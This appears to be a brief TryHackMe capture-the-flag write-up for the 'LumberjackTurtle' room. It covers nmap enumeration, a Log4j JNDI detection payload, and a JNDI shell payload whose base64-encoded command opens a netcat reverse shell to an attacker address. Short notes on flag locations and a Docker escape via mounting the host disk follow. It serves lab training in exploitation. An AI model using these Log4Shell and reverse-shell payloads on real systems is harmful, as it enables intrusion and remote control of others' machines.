Lumberjack_Turtle.md

THM LumberjackTurtle

IP:10.10.204.88

Enumeration

Nmap

PORT   STATE SERVICE     VERSION
22/tcp open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6a:a1:2d:13:6c:8f:3a:2d:e3:ed:84:f4:c7:bf:20:32 (RSA)
|   256 1d:ac:5b:d6:7c:0c:7b:5b:d4:fe:e8:fc:a1:6a:df:7a (ECDSA)
|_  256 13:ee:51:78:41:7e:3f:54:3b:9a:24:9b:06:e2:d5:14 (ED25519)
80/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain;charset=UTF-8).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

We see that we have 2 open ports

80, 22

Port 80

Error

Log4j Detection

we will use this as payload

 ${jndi:ldap://10.18.0.53:4444}

so we have here a log4j vulnerabilty

let's try get shell

Shell

${jndi:ldap://$IP:1389/Basic/Command/Base64/cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDEwLjE4LjAuNTMgNDQ0NCAgPi90bXAvZg==}

User Flag.

user flag found in /opt/.flag1

Docker escape and privilege.

we will mount dev/xvda in tmp 


Fun flag 

Let's try find the real flag

and voila got real root flag

Thanks for watching.